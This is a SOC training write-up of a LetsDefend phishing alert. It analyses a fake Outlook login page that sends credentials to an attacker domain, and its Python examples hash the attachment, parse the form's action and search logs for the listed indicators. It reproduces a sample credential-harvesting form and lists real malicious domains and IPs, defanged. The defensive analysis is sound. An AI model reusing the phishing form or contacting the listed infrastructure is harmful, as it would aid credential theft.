Lets Defend — Password Stealer Detected

Malware Ben
5 min read · Jan 16, 2022

SOC143 — Password Stealer Detected

LetsDefend

LetsDefend is a platform for practical training for blue team members. You can improve your skills in log analysis, incident handling, malware analysis and endpoint analysis.


Today we will analyze a password stealer used in a real cyber attack. Password stealers are a type of malware that steals account information.

Monitoring

Our investigation starts at the Monitoring page, which simulates a real SOC working environment. More details about the incident can be found here. Looking at the details, we can see the source address, the SMTP address and more. Our next step is to copy the sender address and search for it in our mailbox.

Monitoring Window

Mailbox

By searching for the source address in the mailbox, we find the copy of the email that generated the alert.

Copy of the malicious email

We can extract important information found in the email, that could be useful in the future:

  • Subject: .
  • Sender: bill@microsoft[.]com
  • Recipient(s): ellie@letsdefend[.]io
  • Attachment(s): bd05664f01205fa90774f42468a8743a.zip

Next, we will download the attachment and unzip it in a safe environment. In our case, we are using REMnux (https://remnux.org).

After unzipping the attachment, we found one html file:

Generating MD5

Using md5sum, a tool built into REMnux, we calculate the hash of the file found in the attachment. Hashes are useful for positively identifying malware: the malicious file is run through a hashing program that produces a unique hash identifying that sample (a sort of fingerprint).
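The same step can be scripted so that every member of a suspicious archive is hashed without being written to disk. The following is an added example, not code from the original post or from LetsDefend; the ZIP it builds and the HTML file inside it are constructed samples, and the hashes it produces are therefore not the ones from the real attachment.

```python
"""Hash every member of a suspicious ZIP attachment without extracting it.

Added example (not from the original post). The archive is constructed in
memory to stand in for the real attachment; MD5 is produced because the
post looks the file up on VirusTotal by MD5, SHA-256 because the IoC list
at the end of the post uses SHA-256.
"""
import hashlib
import io
import zipfile


def hash_zip_members(zip_bytes: bytes) -> dict:
    """Return {member_name: {"md5": ..., "sha256": ..., "size": ...}}.

    Members are read as bytes straight out of the archive; nothing is
    extracted, so hostile member names (e.g. ../../ paths) never touch
    the filesystem.
    """
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)
            results[info.filename] = {
                "md5": hashlib.md5(data).hexdigest(),
                "sha256": hashlib.sha256(data).hexdigest(),
                "size": info.file_size,
            }
    return results


def matches_known_bad(hashes: dict, known_bad_sha256: set) -> list:
    """Names of members whose SHA-256 appears in an IoC list."""
    return [name for name, h in hashes.items() if h["sha256"] in known_bad_sha256]


def build_sample_zip() -> bytes:
    """Constructed attachment: a ZIP holding one small fake HTML file.

    The file name and content are made up for this example.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("sample_login.html", "<html><body>constructed sample</body></html>")
    return buf.getvalue()


if __name__ == "__main__":
    hashes = hash_zip_members(build_sample_zip())
    for name, h in hashes.items():
        print(f"{name}\n  md5    {h['md5']}\n  sha256 {h['sha256']}\n  size   {h['size']}")
```

For a real attachment, read the downloaded ZIP's bytes into `hash_zip_members` and paste either hash into the VirusTotal search box; the SHA-256 is the value to compare against the IoC list at the end of the post.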

Generating MD5 Hash Window

Virus Total

Next, we perform a hash search on VirusTotal (VT). VT allows you to search through their dataset in order to identify files that match certain criteria. To search for a file that has a given MD5, just type in the hash under consideration in the main search box.

Virus Total Window

According to VT, the file is flagged malicious. At the time of our scan, the result reports 5 antivirus engines claiming the HTML file is malicious.

Dissecting HTML File

Opening the HTML file prompts the user to enter his credentials on a fake Outlook login page. The name of the file, shown below, suggests that the actor was targeting this particular user.

HTML Phishing File

As seen below, attempting to enter credentials in the fake login panel establishes a network connection to the domain tecyardit[.]com. The credentials are sent as a POST request to the URI /post.php.
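The same conclusion can be reached statically, without submitting anything to the phishing page, by listing where each form on the page posts. Below is an added example, not code from the original post; the HTML it parses is a constructed page modelled on the fake Outlook login described above (the action URL reuses the domain and path the post names), and the set of legitimate Microsoft login hosts is an assumption for the example.

```python
"""Static analysis of a phishing HTML page: where does the login form post?

Added example (not from the original post). It collects every <form>, the
credential-looking inputs it holds, and flags any form whose action points
at a host outside the brand the page imitates. Output hosts are defanged.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormCollector(HTMLParser):
    """Gather form actions, methods and input fields from an HTML document."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").upper(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append(
                (a.get("name") or "", (a.get("type") or "text").lower())
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def defang(url: str) -> str:
    """hxxp scheme and [.] in the host so the URL is not clickable."""
    u = urlparse(url)
    host = (u.hostname or "").replace(".", "[.]")
    if not host:
        return url
    query = f"?{u.query}" if u.query else ""
    return f"{u.scheme.replace('http', 'hxxp')}://{host}{u.path}{query}"


def analyse_forms(html: str, expected_hosts: set) -> list:
    """One finding per form: defanged action, method, credential fields,
    and whether it posts to a host the imitated brand would not use."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname or ""
        creds = [
            name for name, typ in form["fields"]
            if typ == "password" or "pass" in name.lower() or "login" in name.lower()
        ]
        findings.append({
            "action": defang(form["action"]),
            "method": form["method"],
            "credential_fields": creds,
            "posts_externally": bool(host) and host not in expected_hosts,
        })
    return findings


# Constructed page mimicking the fake Outlook login; markup is made up,
# the action URL is the domain/path named in the analysis.
SAMPLE_HTML = """
<html><body>
<img src="outlook_logo.png">
<form method="post" action="https://tecyardit.com/wp-content/card/2/post.php">
  <input type="text" name="login" value="ellie@letsdefend.io">
  <input type="password" name="passwd">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

# Assumed list of hosts a genuine Outlook sign-in would post to (example only).
MICROSOFT_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com", "outlook.office.com"}

if __name__ == "__main__":
    for f in analyse_forms(SAMPLE_HTML, MICROSOFT_LOGIN_HOSTS):
        print(f)
```

Running this over the real attachment (read the HTML file's text and pass it in) gives the same defanged action the post lists among its IoCs, and `posts_externally` is the quick check that a "Microsoft" page is actually handing credentials to a third party.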

Inspect Element Window

According to VT, the URI is flagged malicious. At the time of our scan, the result reports 7 antivirus engines claiming the URI is malicious.

Virus Total Results

URLscan is a website scanner written by Johannes Gilger, focusing on analyzing all possible details about any established HTTP connection, site content, relations with other sites and much more.

In our case, the site seems to be unreachable.

URLScan Window

ViewDNS is an online source for DNS-related tools. The tools provided by ViewDNS allow us to gather a large amount of data about a given website or IP address.

In the figure below, we can see the IP history of the malicious domain.

ViewDNS Window

According to VT, the IP is flagged malicious. At the time of our scan, the result reports 1 antivirus engine claiming the IP is malicious.

Virus Total Results

Indicators of Compromise

  • 58c45547bccce5eb16d84bae13eb0c2813ffe03e34eae622b65468a6b289ca37
  • 109[.]68[.]33[.]64
  • 180[.]76[.]101[.]229
  • tecyardit[.]com
  • tecyardit[.]com/wp-content/card/2/post.php

Log Management

We will now use the Log Management page and check if the URL/IPs were accessed.

No log entries were found, which means the user did not enter his credentials.
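The check performed on the Log Management page, searching the logs for any of the collected indicators, can be reproduced against exported logs. The following is an added example, not code from the original post or from LetsDefend; the IoC list is the one collected above, while the log lines are constructed samples in a simple key=value proxy format assumed for the example, not the platform's real log schema.

```python
"""Search exported proxy logs for the indicators gathered during the analysis.

Added example (not from the original post). IoCs are kept defanged as in the
post and refanged only for matching. Host and URL fields are also joined so
that a full-URL indicator can match a log line that records them separately.
"""
import re

# Indicators from the analysis above, as written there (defanged).
IOCS = [
    "58c45547bccce5eb16d84bae13eb0c2813ffe03e34eae622b65468a6b289ca37",
    "109[.]68[.]33[.]64",
    "180[.]76[.]101[.]229",
    "tecyardit[.]com",
    "tecyardit[.]com/wp-content/card/2/post.php",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into its matchable form."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def _searchable(line: str) -> str:
    """Line plus host+url joined, so URL indicators can match key=value logs."""
    kv = dict(re.findall(r"(\w+)=(\S+)", line))
    return line + " " + kv.get("host", "") + kv.get("url", "")


def search_logs(lines: list, iocs: list) -> dict:
    """Return {ioc: [1-based line numbers]} for every indicator that appears."""
    patterns = {ioc: re.compile(re.escape(refang(ioc)), re.IGNORECASE) for ioc in iocs}
    hits = {}
    for n, line in enumerate(lines, 1):
        haystack = _searchable(line)
        for ioc, pat in patterns.items():
            if pat.search(haystack):
                hits.setdefault(ioc, []).append(n)
    return hits


# Constructed sample logs (RFC 5737 documentation addresses, made-up hosts).
CLEAN_LOGS = [
    "2021-04-26T23:05:12Z src=172.16.17.88 dst=203.0.113.10 host=intranet.example.com method=GET url=/home status=200",
    "2021-04-26T23:07:41Z src=172.16.17.88 dst=198.51.100.7 host=cdn.example.net method=GET url=/lib.js status=200",
]
# The same set plus one line showing what a credential submission would look like.
HIT_LOGS = CLEAN_LOGS + [
    "2021-04-26T23:09:03Z src=172.16.17.88 dst=109.68.33.64 host=tecyardit.com method=POST url=/wp-content/card/2/post.php status=200",
]

if __name__ == "__main__":
    print("clean logs:", search_logs(CLEAN_LOGS, IOCS))  # no hits: user never submitted
    print("hit logs:  ", search_logs(HIT_LOGS, IOCS))
```

An empty result over the real export is the evidence behind the conclusion in the post; a non-empty one (as in `HIT_LOGS`) would point straight at the line, source host and time of the credential submission.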

Log Management Window

Case Management Detail

Now we have enough information to conclude that the alert is a true positive and that an incident should be opened.

We can answer the questions of the playbook with the information we’ve collected during our analysis.

Case Management Window

Playbook

A security playbook is a list of required steps and actions needed to successfully respond to any incident or threat. Playbooks provide a step-by-step approach to orchestration, helping security teams to establish standardized incident response processes and ensuring the steps are followed in compliance with regulatory frameworks.

Playbook Window
  • When was it sent?
    April 26, 2021, 11:03 PM
  • What is the email’s SMTP address?
    180[.]76[.]101[.]229
  • What is the sender address?
    bill@microsoft[.]com
  • What is the recipient address?
    ellie@letsdefend.io
  • Is the mail content suspicious?
    Yes.
  • Are there any attachments?
    Yes.

